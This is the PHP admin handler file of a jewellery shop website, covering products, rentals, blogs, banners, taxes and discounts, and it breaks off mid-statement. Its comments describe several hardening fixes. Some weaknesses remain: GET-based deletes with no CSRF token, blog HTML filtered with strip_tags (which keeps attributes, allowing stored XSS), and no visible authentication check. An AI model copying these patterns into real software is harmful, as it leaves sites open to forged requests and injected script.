
Current File : //home/ni05r7l36tus/www/poojajewellersbbsr.com/admin/function.php
<?php
// ================= Database Connection =================
// Log errors instead of rendering them to visitors
ini_set('display_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);

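// Credentials are read from the environment rather than hard-coded in the source.
// The variable names DB_HOST, DB_NAME, DB_USER and DB_PASS are assumptions, not from the original file.
$host = getenv('DB_HOST') ?: 'localhost';
$db   = getenv('DB_NAME') ?: 'poojajeweller';
$user = getenv('DB_USER');
$pass = getenv('DB_PASS');
$charset = 'utf8mb4';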

// $host = 'localhost';
// $db   = 'poojajeweller';
// $user = 'root';
// $pass = '';
// $charset = 'utf8mb4';
$dsn = "mysql:host=$host;dbname=$db;charset=$charset";
$options = [
    PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    PDO::ATTR_EMULATE_PREPARES   => false,
];

try {
    $pdo = new PDO($dsn, $user, $pass, $options);
    if (session_status() == PHP_SESSION_NONE) session_start();
} catch (PDOException $e) {
    die("Database connection failed: " . htmlspecialchars($e->getMessage()));
}

// ================== SALE PRODUCT ==================
if (isset($_POST['add_sale_product'])) {
    $product_name = $_POST['product_name'];
    $metal_type = $_POST['metal_type'];
    $metal_purity = $_POST['metal_purity'];
    $weight = floatval($_POST['weight']);
    $net_weight = floatval($_POST['net_weight']);
    $dimensions = $_POST['dimensions'];
    $hallmark_certification = $_POST['hallmark_certification'];
    $making_charges = floatval($_POST['making_charges']);
    $mrp = floatval($_POST['mrp']);
    $price = floatval($_POST['price']);
    $discount_percentage = floatval($_POST['discount_percentage']);
    $tax_percentage = floatval($_POST['tax_percentage']);
    $stock_quantity = intval($_POST['stock_quantity']);
    $sku_code = $_POST['sku_code'];

    // Products table
    $stmt = $pdo->prepare("INSERT INTO products (product_name) VALUES (:product_name)");
    $stmt->execute([':product_name' => $product_name]);
    $product_id = $pdo->lastInsertId();

    // Gold/Silver table
    $stmt = $pdo->prepare("
        INSERT INTO product_gold_silver
        (product_id, metal_type, metal_purity, weight, net_weight, dimensions, hallmark_certification)
        VALUES (:product_id, :metal_type, :metal_purity, :weight, :net_weight, :dimensions, :hallmark_certification)
    ");
    $stmt->execute(compact('product_id','metal_type','metal_purity','weight','net_weight','dimensions','hallmark_certification'));

    // Sales table
    $stmt = $pdo->prepare("
        INSERT INTO product_sales
        (product_id, making_charges, mrp, price, discount_percentage, tax_percentage, stock_quantity, sku_code)
        VALUES (:product_id, :making_charges, :mrp, :price, :discount_percentage, :tax_percentage, :stock_quantity, :sku_code)
    ");
    $stmt->execute(compact('product_id','making_charges','mrp','price','discount_percentage','tax_percentage','stock_quantity','sku_code'));

    header("Location: product.php"); exit;
}

if (isset($_POST['update_sale_product'])) {
    $product_id = intval($_POST['product_id']);
    $product_name = $_POST['product_name'];
    $metal_type = $_POST['metal_type'];
    $metal_purity = $_POST['metal_purity'];
    $weight = floatval($_POST['weight']);
    $net_weight = floatval($_POST['net_weight']);
    $dimensions = $_POST['dimensions'];
    $hallmark_certification = $_POST['hallmark_certification'];
    $making_charges = floatval($_POST['making_charges']);
    $mrp = floatval($_POST['mrp']);
    $price = floatval($_POST['price']);
    $discount_percentage = floatval($_POST['discount_percentage']);
    $tax_percentage = floatval($_POST['tax_percentage']);
    $stock_quantity = intval($_POST['stock_quantity']);
    $sku_code = $_POST['sku_code'];

    // Update products
    $stmt = $pdo->prepare("UPDATE products SET product_name=:product_name WHERE product_id=:product_id");
    $stmt->execute([':product_name'=>$product_name, ':product_id'=>$product_id]);

    // Update gold/silver
    $stmt = $pdo->prepare("
        UPDATE product_gold_silver SET metal_type=:metal_type, metal_purity=:metal_purity, weight=:weight, net_weight=:net_weight, dimensions=:dimensions, hallmark_certification=:hallmark_certification
        WHERE product_id=:product_id
    ");
    $stmt->execute(compact('metal_type','metal_purity','weight','net_weight','dimensions','hallmark_certification','product_id'));

    // Update sales
    $stmt = $pdo->prepare("
        UPDATE product_sales SET making_charges=:making_charges, mrp=:mrp, price=:price, discount_percentage=:discount_percentage, tax_percentage=:tax_percentage, stock_quantity=:stock_quantity, sku_code=:sku_code
        WHERE product_id=:product_id
    ");
    $stmt->execute(compact('making_charges','mrp','price','discount_percentage','tax_percentage','stock_quantity','sku_code','product_id'));

    header("Location: product.php"); exit;
}

// ================== RENTAL PRODUCT ==================
if (isset($_POST['add_rental_product'])) {
    $product_name = $_POST['product_name'];
    $tag_number = $_POST['tag_number'];
    $material_description = $_POST['material_description'];
    $stone_weight = floatval($_POST['stone_weight']);
    $stone_count = intval($_POST['stone_count']);
    $stone_color = $_POST['stone_color'];
    $rental_amount = floatval($_POST['rental_amount']);
    // Must be named $deposit_amount: compact() below binds it to :deposit_amount
    $deposit_amount = floatval($_POST['deposit_amount']);
    $rental_duration = $_POST['rental_duration'];
    $late_fee = floatval($_POST['late_fee']);

    // Products
    $stmt = $pdo->prepare("INSERT INTO products (product_name) VALUES (:product_name)");
    $stmt->execute([':product_name' => $product_name]);
    $product_id = $pdo->lastInsertId();

    // Rentals
    $stmt = $pdo->prepare("
        INSERT INTO product_rentals
        (product_id, rental_amount, deposit_amount, rental_duration, late_fee)
        VALUES (:product_id, :rental_amount, :deposit_amount, :rental_duration, :late_fee)
    ");
    $stmt->execute(compact('product_id','rental_amount','deposit_amount','rental_duration','late_fee'));

    // Fancy
    $stmt = $pdo->prepare("
        INSERT INTO product_fancy
        (product_id, material_description, stone_weight, stone_count, stone_color)
        VALUES (:product_id, :material_description, :stone_weight, :stone_count, :stone_color)
    ");
    $stmt->execute(compact('product_id','material_description','stone_weight','stone_count','stone_color'));

    header("Location: product.php"); exit;
}

if (isset($_POST['update_rental_product'])) {
    $product_id = intval($_POST['product_id']);
    $product_name = $_POST['product_name'];
    $tag_number = $_POST['tag_number'];
    $material_description = $_POST['material_description'];
    $stone_weight = floatval($_POST['stone_weight']);
    $stone_count = intval($_POST['stone_count']);
    $stone_color = $_POST['stone_color'];
    $rental_amount = floatval($_POST['rental_amount']);
    $deposit_amount = floatval($_POST['deposit_amount']);
    $rental_duration = $_POST['rental_duration'];
    $late_fee = floatval($_POST['late_fee']);

    // Update products
    $stmt = $pdo->prepare("UPDATE products SET product_name=:product_name WHERE product_id=:product_id");
    $stmt->execute([':product_name'=>$product_name, ':product_id'=>$product_id]);

    // Update rentals
    $stmt = $pdo->prepare("
        UPDATE product_rentals SET rental_amount=:rental_amount, deposit_amount=:deposit_amount, rental_duration=:rental_duration, late_fee=:late_fee
        WHERE product_id=:product_id
    ");
    $stmt->execute(compact('rental_amount','deposit_amount','rental_duration','late_fee','product_id'));

    // Update fancy
    $stmt = $pdo->prepare("
        UPDATE product_fancy SET material_description=:material_description, stone_weight=:stone_weight, stone_count=:stone_count, stone_color=:stone_color
        WHERE product_id=:product_id
    ");
    $stmt->execute(compact('material_description','stone_weight','stone_count','stone_color','product_id'));

    header("Location: product.php"); exit;
}

include 'connection/config.php';


// ---------------- ADD AUSPICIOUS ----------------
if (isset($_POST['add_auspicious'])) {
    $title = $_POST['auspicious_title'] ?? '';
    $date  = $_POST['auspicious_date'] ?? '';
    $icon  = "";

    // Handle file upload
    if (!empty($_FILES['auspicious_icon']['name'])) {
        $uploadDir = __DIR__ . "/../uploads/icon/";
        if (!is_dir($uploadDir)) {
            mkdir($uploadDir, 0755, true);
        }

        // Accept image extensions only and never reuse the client-supplied file name
        $ext        = strtolower(pathinfo($_FILES['auspicious_icon']['name'], PATHINFO_EXTENSION));
        $allowedExt = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
        $fileName   = time() . "_" . bin2hex(random_bytes(8)) . "." . $ext;
        $icon       = "uploads/icon/" . $fileName; // relative path for DB
        $targetFile = $uploadDir . $fileName;

        if (!in_array($ext, $allowedExt, true) || !move_uploaded_file($_FILES['auspicious_icon']['tmp_name'], $targetFile)) {
            echo "<p style='color:red'>⚠️ File upload failed for Auspicious Day.</p>";
            $icon = "";
        }
    }

    if ($title && $icon && $date) {
        try {
            $stmt = $pdo->prepare("INSERT INTO auspicious_days (title, icon, day_date) VALUES (:title, :icon, :day_date)");
            $stmt->execute([
                ':title'    => $title,
                ':icon'     => $icon,
                ':day_date' => $date
            ]);

            header("Location: aspicious.php");
            exit;

        } catch (PDOException $e) {
            // Escape the driver message before it is written into the HTML response
            echo "<p style='color:red'>⚠️ Database error: " . htmlspecialchars($e->getMessage()) . "</p>";
        }
    } else {
        echo "<p style='color:red'>⚠️ Please provide Title, Icon and Date for Auspicious Day.</p>";
    }
}

// ---------------- UPDATE AUSPICIOUS ----------------
if (isset($_POST['update_auspicious']) && isset($_POST['id'])) {
    $id    = (int)$_POST['id'];
    $title = $_POST['auspicious_title'] ?? '';
    $date  = $_POST['auspicious_date'] ?? '';

    // Fetch existing icon
    $stmt = $pdo->prepare("SELECT icon FROM auspicious_days WHERE id = ?");
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    $icon = $row['icon'] ?? '';

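    // Handle new file upload
    if (!empty($_FILES['auspicious_icon']['name'])) {
        $uploadDir = __DIR__ . "/../uploads/icon/";
        if (!is_dir($uploadDir)) {
            mkdir($uploadDir, 0755, true);
        }

        // Accept image extensions only and never reuse the client-supplied file name
        $ext        = strtolower(pathinfo($_FILES['auspicious_icon']['name'], PATHINFO_EXTENSION));
        $allowedExt = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
        $fileName   = time() . "_" . bin2hex(random_bytes(8)) . "." . $ext;
        $newIcon    = "uploads/icon/" . $fileName;
        $targetFile = $uploadDir . $fileName;

        if (in_array($ext, $allowedExt, true) && move_uploaded_file($_FILES['auspicious_icon']['tmp_name'], $targetFile)) {
            // Delete old file if exists (icon paths are stored relative to the directory above this script)
            if ($icon && file_exists(__DIR__ . '/../' . $icon)) {
                unlink(__DIR__ . '/../' . $icon);
            }
            $icon = $newIcon;
        }
    }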

    if ($title && $date) {
        try {
            $stmt = $pdo->prepare("UPDATE auspicious_days SET title = :title, day_date = :day_date, icon = :icon WHERE id = :id");
            $stmt->execute([
                ':title'    => $title,
                ':day_date' => $date,
                ':icon'     => $icon,
                ':id'       => $id
            ]);

            header("Location: aspicious.php");
            exit;

        } catch (PDOException $e) {
            // Escape the driver message before it is written into the HTML response
            echo "<p style='color:red'>⚠️ Database error: " . htmlspecialchars($e->getMessage()) . "</p>";
        }
    } else {
        echo "<p style='color:red'>⚠️ Please provide Title and Date for Auspicious Day.</p>";
    }
}

// ======================= DELETE =======================
if (isset($_GET['delete_auspicious'])) {
    $id = (int)$_GET['delete_auspicious'];

    // Fetch existing icon
    $stmt = $pdo->prepare("SELECT icon FROM auspicious_days WHERE id = ?");
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Delete icon file (icon paths are stored relative to the directory above this script)
    if (!empty($row['icon']) && file_exists(__DIR__ . '/../' . $row['icon'])) {
        unlink(__DIR__ . '/../' . $row['icon']);
    }

    // Delete record
    $stmt = $pdo->prepare("DELETE FROM auspicious_days WHERE id = ?");
    $stmt->execute([$id]);

    header("Location:aspicious.php");
    exit;
}
   
// ---------- ADD BLOG ----------

$uploadDirblog = __DIR__ . "/../uploads/blog/";
if (!file_exists($uploadDirblog)) {
    mkdir($uploadDirblog, 0777, true);
}
if (isset($_POST['add_blog'])) {
    $title         = htmlspecialchars($_POST['title'] ?? '');
    $publish_date     = htmlspecialchars($_POST['publish_date'] ?? '');
    $author        = htmlspecialchars($_POST['author'] ?? '');
    $allowed_tags = '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>';
    $description = strip_tags($_POST['description'] ?? '', $allowed_tags);
    $slug          = htmlspecialchars($_POST['slug'] ?? '');
    $keyword       = htmlspecialchars($_POST['meta_keyword'] ?? '');
    $metatitle     = htmlspecialchars($_POST['meta_title'] ?? '');
    $metadescription= htmlspecialchars($_POST['meta_description'] ?? '');

    // Image Upload (optional)
$image = null;
if (!empty($_FILES['image']['name'])) {
    $imageTmp = $_FILES['image']['tmp_name'];
    $imageExt = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION));

    // Use blog title or fallback to "blog"
    $seoName = !empty($_POST['slug']) 
        ? preg_replace('/[^a-z0-9]+/i', '-', strtolower($_POST['slug'])) 
        : 'blog';
    $seoName = trim($seoName, '-');

    // Final name: blog-title.webp (no random numbers)
    $newName  = 'blog-' . $seoName . '.webp';
    $destPath = $uploadDirblog . $newName;

    switch ($imageExt) {
        case 'jpg':
        case 'jpeg':
            $src = imagecreatefromjpeg($imageTmp);
            break;
        case 'png':
            $src = imagecreatefrompng($imageTmp);
            imagepalettetotruecolor($src);
            imagealphablending($src, true);
            imagesavealpha($src, true);
            break;
        case 'gif':
            $src = imagecreatefromgif($imageTmp);
            break;
        case 'webp':
            $src = imagecreatefromwebp($imageTmp);
            break;
        default:
            $src = false;
    }

    if ($src !== false) {
        imagewebp($src, $destPath, 80);
        imagedestroy($src);
        $image = $newName;
    }
}


    try {
        $stmt = $pdo->prepare("
            INSERT INTO `blog`
            (`title`, `image`, `publish_date`, `author`, 
             `description`,`slug`, `meta_keyword`, `meta_title`, `meta_description`)
            VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)
        ");

        $stmt->execute([
            $title,
            $image,
            $publish_date,
            $author,
            $description,
            $slug,
            $keyword,
            $metatitle,
            $metadescription
        ]);

        header("Location: blog.php");
        exit();
    } catch (PDOException $e) {
        // Escape the driver message before it is written into the response
        echo "Database Error: " . htmlspecialchars($e->getMessage());
    }
}

// ---------- UPDATE BLOG ----------
if (isset($_POST['update_blog'])) {
    $id            = intval($_POST['id']);
    $title         = htmlspecialchars($_POST['title'] ?? '');
    $publish_date  = htmlspecialchars($_POST['publish_date'] ?? '');
    $author        = htmlspecialchars($_POST['author'] ?? '');
    $allowed_tags  = '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>';
    $description   = strip_tags($_POST['description'] ?? '', $allowed_tags);
    $slug          = htmlspecialchars($_POST['slug'] ?? '');
    $keyword       = htmlspecialchars($_POST['meta_keyword'] ?? '');
    $metatitle     = htmlspecialchars($_POST['meta_title'] ?? '');
    $metadescription = htmlspecialchars($_POST['meta_description'] ?? '');

    // Fetch old image (in case new one is not uploaded)
$stmt = $pdo->prepare("SELECT image FROM blog WHERE id = ?");
$stmt->execute([$id]);
$oldImage = $stmt->fetchColumn();

$image = $oldImage;
// If new image uploaded → replace
if (!empty($_FILES['image']['name'])) {
    $imageTmp = $_FILES['image']['tmp_name'];
    $imageExt = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION));

    // Create SEO-friendly name
    $seoName = !empty($_POST['slug']) 
        ? preg_replace('/[^a-z0-9]+/i', '-', strtolower($_POST['slug'])) 
        : (!empty($_POST['title']) 
            ? preg_replace('/[^a-z0-9]+/i', '-', strtolower($_POST['title'])) 
            : 'blog');
    $seoName = trim($seoName, '-');

    $newName  = 'blog-' . $seoName . '.webp';
    $destPath = $uploadDirblog . $newName;

    switch ($imageExt) {
        case 'jpg':
        case 'jpeg':
            $src = imagecreatefromjpeg($imageTmp);
            break;
        case 'png':
            $src = imagecreatefrompng($imageTmp);
            imagepalettetotruecolor($src);
            imagealphablending($src, true);
            imagesavealpha($src, true);
            break;
        case 'gif':
            $src = imagecreatefromgif($imageTmp);
            break;
        case 'webp':
            $src = imagecreatefromwebp($imageTmp);
            break;
        default:
            $src = false;
    }

    if ($src !== false) {
        if (imagewebp($src, $destPath, 80)) {
            $image = $newName;
        }
        imagedestroy($src);

        // Delete only if different filename
        if ($oldImage && $oldImage !== $newName && file_exists($uploadDirblog . $oldImage)) {
            unlink($uploadDirblog . $oldImage);
        }
    }
}


    try {
        $stmt = $pdo->prepare("
            UPDATE `blog` SET 
                `title` = ?, 
                `image` = ?, 
                `publish_date` = ?, 
                `author` = ?, 
                `description` = ?, 
                `slug` = ?, 
                `meta_keyword` = ?, 
                `meta_title` = ?, 
                `meta_description` = ?
            WHERE `id` = ?
        ");
        $stmt->execute([
            $title,
            $image,
            $publish_date,
            $author,
            $description,
            $slug,
            $keyword,
            $metatitle,
            $metadescription,
            $id
        ]);

        header("Location: blog.php");
        exit();
    } catch (PDOException $e) {
        // Escape the driver message before it is written into the response
        echo "Database Error: " . htmlspecialchars($e->getMessage());
    }
}
// ---------- DELETE BLOG ----------
if (isset($_GET['delete_blog'])) {
    $id = (int)$_GET['delete_blog'];
    $stmtImg = $pdo->prepare("SELECT image FROM blog WHERE id=?");
    $stmtImg->execute([$id]);
    $imagePath = $stmtImg->fetchColumn();

    if ($imagePath) {
        $fullPath = $uploadDirblog . $imagePath;
        if (file_exists($fullPath)) {
            if (unlink($fullPath)) {
                // echo "Image deleted: " . $fullPath;
            } else {
                echo "Failed to delete image: " . $fullPath;
            }
        } else {
            echo "Image not found at: " . $fullPath;
        }
    }
    try {
        $stmt = $pdo->prepare("DELETE FROM blog WHERE id=?");
        $stmt->execute([$id]);

        header("Location: blog.php");
        exit();
    } catch (PDOException $e) {
        // Escape the driver message before it is written into the response
        echo "Database Error: " . htmlspecialchars($e->getMessage());
    }
}



//----------------------------------------------------------
// Add Banner
//----------------------------------------------------------
if (isset($_POST['add_banner'])) {
    $title = !empty($_POST['title']) ? htmlspecialchars(trim($_POST['title'])) : "";

    $image_name = null;
    if (!empty($_FILES['image']['name'])) {
        $dir = "../uploads/banner/";
        if (!is_dir($dir)) {
            mkdir($dir, 0777, true);
        }

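        $image = $_FILES['image']['name'];
        $image_tmp = $_FILES['image']['tmp_name'];
        // Allow image extensions only, so a script cannot be stored under the web root
        $image_extn = strtolower(pathinfo($image, PATHINFO_EXTENSION));
        if (!in_array($image_extn, ['jpg', 'jpeg', 'png', 'gif', 'webp'], true)) {
            die("ERROR: File not uploaded. Try again.");
        }
        $image_name = rand(10, 100) . time() . '.' . $image_extn;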

        if (!move_uploaded_file($image_tmp, $dir . $image_name)) {
            die("ERROR: File not uploaded. Try again.");
        }
    }

    $stmt = $pdo->prepare("INSERT INTO `banner` (`title`, `image`) VALUES (:title, :image)");
    $stmt->execute(['title' => $title, 'image' => $image_name]);

    header("Location: banner.php");
    exit();
}

//----------------------------------------------------------
// Update Banner
//----------------------------------------------------------
if (isset($_POST['update_banner'])) {
    $id = intval($_POST['id']);
    $title = !empty($_POST['title']) ? htmlspecialchars(trim($_POST['title'])) : "";

    if (!empty($_FILES['image']['name'])) {
        $dir = "../uploads/banner/";
        if (!is_dir($dir)) {
            mkdir($dir, 0777, true);
        }

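        $image = $_FILES['image']['name'];
        $image_tmp = $_FILES['image']['tmp_name'];
        // Allow image extensions only, so a script cannot be stored under the web root
        $image_extn = strtolower(pathinfo($image, PATHINFO_EXTENSION));
        if (!in_array($image_extn, ['jpg', 'jpeg', 'png', 'gif', 'webp'], true)) {
            die("ERROR: File not uploaded. Try again.");
        }
        $image_name = rand(10, 100) . time() . '.' . $image_extn;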

        if (!move_uploaded_file($image_tmp, $dir . $image_name)) {
            die("ERROR: File not uploaded. Try again.");
        }
    } else {
        // Keep old image if not updated; basename() stops a posted path from reaching unlink() later
        $image_name = basename($_POST['hidden_image'] ?? '');
    }

    $stmt = $pdo->prepare("UPDATE `banner` SET `title` = :title, `image` = :image WHERE `id` = :id");
    $stmt->execute(['title' => $title, 'image' => $image_name, 'id' => $id]);

    header("Location: banner.php");
    exit();
}

//----------------------------------------------------------
// Delete Banner
//----------------------------------------------------------
if (isset($_GET['action']) && $_GET['action'] == 'delete_banner') {
    $id = intval($_GET['id']);

    $stmt = $pdo->prepare("SELECT `image` FROM `banner` WHERE `id` = :id");
    $stmt->execute(['id' => $id]);
    $row = $stmt->fetch();

    if ($row && file_exists("../uploads/banner/" . $row['image'])) {
        unlink("../uploads/banner/" . $row['image']);
    }

    $stmt = $pdo->prepare("DELETE FROM `banner` WHERE `id` = :id");
    $stmt->execute(['id' => $id]);

    header("Location: banner.php");
    exit();
}


//----------------------------------------------------------
// Add Instaphoto
//----------------------------------------------------------
if (isset($_POST['add_instaphoto'])) {
    $title = !empty($_POST['title']) ? htmlspecialchars(trim($_POST['title'])) : "";

    $image_name = null;
    if (!empty($_FILES['image']['name'])) {
        $dir = "../uploads/instaphoto/";
        if (!is_dir($dir)) {
            mkdir($dir, 0777, true);
        }

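        $image = $_FILES['image']['name'];
        $image_tmp = $_FILES['image']['tmp_name'];
        // Allow image extensions only, so a script cannot be stored under the web root
        $image_extn = strtolower(pathinfo($image, PATHINFO_EXTENSION));
        if (!in_array($image_extn, ['jpg', 'jpeg', 'png', 'gif', 'webp'], true)) {
            die("ERROR: File not uploaded. Try again.");
        }
        $image_name = rand(10, 100) . time() . '.' . $image_extn;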

        if (!move_uploaded_file($image_tmp, $dir . $image_name)) {
            die("ERROR: File not uploaded. Try again.");
        }
    }

    $stmt = $pdo->prepare("INSERT INTO `instaphoto` (`title`, `image`) VALUES (:title, :image)");
    $stmt->execute(['title' => $title, 'image' => $image_name]);

    header("Location: instaphoto.php");
    exit();
}

//----------------------------------------------------------
// Update Instaphoto
//----------------------------------------------------------
if (isset($_POST['update_instaphoto'])) {
    $id = intval($_POST['id']);
    $title = !empty($_POST['title']) ? htmlspecialchars(trim($_POST['title'])) : "";

    if (!empty($_FILES['image']['name'])) {
        $dir = "../uploads/instaphoto/";
        if (!is_dir($dir)) {
            mkdir($dir, 0777, true);
        }

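        $image = $_FILES['image']['name'];
        $image_tmp = $_FILES['image']['tmp_name'];
        // Allow image extensions only, so a script cannot be stored under the web root
        $image_extn = strtolower(pathinfo($image, PATHINFO_EXTENSION));
        if (!in_array($image_extn, ['jpg', 'jpeg', 'png', 'gif', 'webp'], true)) {
            die("ERROR: File not uploaded. Try again.");
        }
        $image_name = rand(10, 100) . time() . '.' . $image_extn;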

        if (!move_uploaded_file($image_tmp, $dir . $image_name)) {
            die("ERROR: File not uploaded. Try again.");
        }
    } else {
        // Keep old image if not updated; basename() stops a posted path from reaching unlink() later
        $image_name = basename($_POST['hidden_image'] ?? '');
    }

    $stmt = $pdo->prepare("UPDATE `instaphoto` SET `title` = :title, `image` = :image WHERE `id` = :id");
    $stmt->execute(['title' => $title, 'image' => $image_name, 'id' => $id]);

    header("Location: instaphoto.php");
    exit();
}

//----------------------------------------------------------
// Delete Instaphoto
//----------------------------------------------------------
if (isset($_GET['action']) && $_GET['action'] == 'delete_instaphoto' && isset($_GET['id'])) {

    $id = intval($_GET['id']); // Get the ID safely
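    // Accept only a bare local page name; a raw ?redirect= value in the Location header is an open redirect
    $redirect = (isset($_GET['redirect']) && preg_match('/^[a-z0-9_-]+\.php$/i', $_GET['redirect'])) ? $_GET['redirect'] : 'instaphoto.php';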

    // Fetch the specific image for this ID
    $stmt = $pdo->prepare("SELECT `image` FROM `instaphoto` WHERE `id` = :id LIMIT 1");
    $stmt->execute(['id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row && !empty($row['image'])) {
        $filePath = "../uploads/instaphoto/" . $row['image'];
        if (file_exists($filePath)) {
            unlink($filePath); // Delete the file
        }
    }

    // Delete only the specific record
    $stmt = $pdo->prepare("DELETE FROM `instaphoto` WHERE `id` = :id LIMIT 1");
    $stmt->execute(['id' => $id]);

    // Redirect back to the page
    header("Location: $redirect");
    exit();
}

//----------------------------------------------------------
// Update store location 
//----------------------------------------------------------
if (isset($_POST['update_store'])) {

    $id = intval($_POST['id']); // store ID
    $store_name = trim($_POST['store_name'] ?? '');
    $phone1     = trim($_POST['phone1'] ?? '');
    $phone2     = trim($_POST['phone2'] ?? '');
    $email1     = trim($_POST['email1'] ?? '');
    $email2     = trim($_POST['email2'] ?? '');
    $facebook   = trim($_POST['facebook'] ?? '');
    $instagram  = trim($_POST['instagram'] ?? '');
    $youtube    = trim($_POST['youtube'] ?? '');
    $telegram   = trim($_POST['telegram'] ?? '');
    $address1   = trim($_POST['address1'] ?? '');
    $address2   = trim($_POST['address2'] ?? '');
    $opentime   = trim($_POST['opentime'] ?? '');
    $closetime  = trim($_POST['closetime'] ?? '');
    $map1       = trim($_POST['map1'] ?? '');
    $map2       = trim($_POST['map2'] ?? '');

    // PDO Update
    $stmt = $pdo->prepare("UPDATE store_locations SET 
        store_name = :store_name,
        phone1 = :phone1,
        phone2 = :phone2,
        email1 = :email1,
        email2 = :email2,
        facebook = :facebook,
        instagram = :instagram,
        youtube = :youtube,
        telegram = :telegram,
        address1 = :address1,
        address2 = :address2,
        opentime = :opentime,
        closetime = :closetime,
        map1 = :map1,
        map2 = :map2
        WHERE id = :id
    ");

    $success = $stmt->execute([
        ':store_name' => $store_name,
        ':phone1'     => $phone1,
        ':phone2'     => $phone2,
        ':email1'     => $email1,
        ':email2'     => $email2,
        ':facebook'   => $facebook,
        ':instagram'  => $instagram,
        ':youtube'    => $youtube,
        ':telegram'   => $telegram,
        ':address1'   => $address1,
        ':address2'   => $address2,
        ':opentime'   => $opentime,
        ':closetime'  => $closetime,
        ':map1'       => $map1,
        ':map2'       => $map2,
        ':id'         => $id
    ]);

    if ($success) {
        header("Location: store-location.php");
        exit();
    } else {
        echo "Store settings not updated.";
    }
}



//----------------------------------------------------------
// Add Tax
//----------------------------------------------------------
if (isset($_POST['add_tax'])) {
    $tax_name = !empty($_POST['tax_name']) ? htmlspecialchars(trim($_POST['tax_name'])) : "";
    $tax_rate = !empty($_POST['tax_rate']) ? floatval($_POST['tax_rate']) : 0.00;
    $status   = !empty($_POST['status']) ? $_POST['status'] : 'active';

    $stmt = $pdo->prepare("INSERT INTO `taxes` (`tax_name`, `tax_rate`, `status`) 
                           VALUES (:tax_name, :tax_rate, :status)");
    $stmt->execute([
        'tax_name' => $tax_name,
        'tax_rate' => $tax_rate,
        'status'   => $status
    ]);

    header("Location: tax.php");
    exit();
}

//----------------------------------------------------------
// Update Tax
//----------------------------------------------------------
if (isset($_POST['update_tax'])) {
    $tax_id   = intval($_POST['tax_id']);
    $tax_name = !empty($_POST['tax_name']) ? htmlspecialchars(trim($_POST['tax_name'])) : "";
    $tax_rate = !empty($_POST['tax_rate']) ? floatval($_POST['tax_rate']) : 0.00;
    $status   = !empty($_POST['status']) ? $_POST['status'] : 'active';

    $stmt = $pdo->prepare("UPDATE `taxes` 
                           SET `tax_name` = :tax_name, 
                               `tax_rate` = :tax_rate, 
                               `status` = :status 
                           WHERE `tax_id` = :tax_id");
    $stmt->execute([
        'tax_name' => $tax_name,
        'tax_rate' => $tax_rate,
        'status'   => $status,
        'tax_id'   => $tax_id
    ]);

    header("Location: tax.php");
    exit();
}

//----------------------------------------------------------
// Delete Tax
//----------------------------------------------------------
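// Note: this and the other delete_* handlers below change data on a GET request, and no
// CSRF token is checked inside these handlers; prefer POST plus a token.
if (isset($_GET['action']) && $_GET['action'] === 'delete_tax') {
    // A missing tax_id becomes 0 (matches no row) instead of raising an undefined-key warning
    $tax_id = intval($_GET['tax_id'] ?? 0);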

    $stmt = $pdo->prepare("DELETE FROM `taxes` WHERE `tax_id` = :tax_id");
    $stmt->execute(['tax_id' => $tax_id]);

    header("Location: tax.php");
    exit();
}




//----------------------------------------------------------
// Add Discount
//----------------------------------------------------------
if (isset($_POST['add_discount'])) {
    $code            = !empty($_POST['code']) ? strtoupper(trim($_POST['code'])) : "";
    $description     = !empty($_POST['description']) ? htmlspecialchars(trim($_POST['description'])) : null;
    $discount_type   = !empty($_POST['discount_type']) ? $_POST['discount_type'] : "fixed";
    $discount_value  = !empty($_POST['discount_value']) ? floatval($_POST['discount_value']) : 0.00;
    $min_order_value = !empty($_POST['min_order_value']) ? floatval($_POST['min_order_value']) : 0.00;
    $max_discount    = !empty($_POST['max_discount']) ? floatval($_POST['max_discount']) : null;
    $usage_limit     = !empty($_POST['usage_limit']) ? intval($_POST['usage_limit']) : null;
    $start_date      = !empty($_POST['start_date']) ? $_POST['start_date'] : date("Y-m-d");
    $end_date        = !empty($_POST['end_date']) ? $_POST['end_date'] : date("Y-m-d");
    $status          = !empty($_POST['status']) ? $_POST['status'] : 'active';

    $stmt = $pdo->prepare("INSERT INTO `discounts` 
        (`code`, `description`, `discount_type`, `discount_value`, `min_order_value`, `max_discount`, `usage_limit`, `start_date`, `end_date`, `status`) 
        VALUES 
        (:code, :description, :discount_type, :discount_value, :min_order_value, :max_discount, :usage_limit, :start_date, :end_date, :status)");

    $stmt->execute([
        'code'            => $code,
        'description'     => $description,
        'discount_type'   => $discount_type,
        'discount_value'  => $discount_value,
        'min_order_value' => $min_order_value,
        'max_discount'    => $max_discount,
        'usage_limit'     => $usage_limit,
        'start_date'      => $start_date,
        'end_date'        => $end_date,
        'status'          => $status
    ]);

    header("Location: discount.php");
    exit();
}

//----------------------------------------------------------
// Update Discount
//----------------------------------------------------------
if (isset($_POST['update_discount'])) {
    $discount_id     = intval($_POST['discount_id']);
    $code            = !empty($_POST['code']) ? strtoupper(trim($_POST['code'])) : "";
    $description     = !empty($_POST['description']) ? htmlspecialchars(trim($_POST['description'])) : null;
    $discount_type   = !empty($_POST['discount_type']) ? $_POST['discount_type'] : "fixed";
    $discount_value  = !empty($_POST['discount_value']) ? floatval($_POST['discount_value']) : 0.00;
    $min_order_value = !empty($_POST['min_order_value']) ? floatval($_POST['min_order_value']) : 0.00;
    $max_discount    = !empty($_POST['max_discount']) ? floatval($_POST['max_discount']) : null;
    $usage_limit     = !empty($_POST['usage_limit']) ? intval($_POST['usage_limit']) : null;
    $start_date      = !empty($_POST['start_date']) ? $_POST['start_date'] : date("Y-m-d");
    $end_date        = !empty($_POST['end_date']) ? $_POST['end_date'] : date("Y-m-d");
    $status          = !empty($_POST['status']) ? $_POST['status'] : 'active';

    $stmt = $pdo->prepare("UPDATE `discounts` 
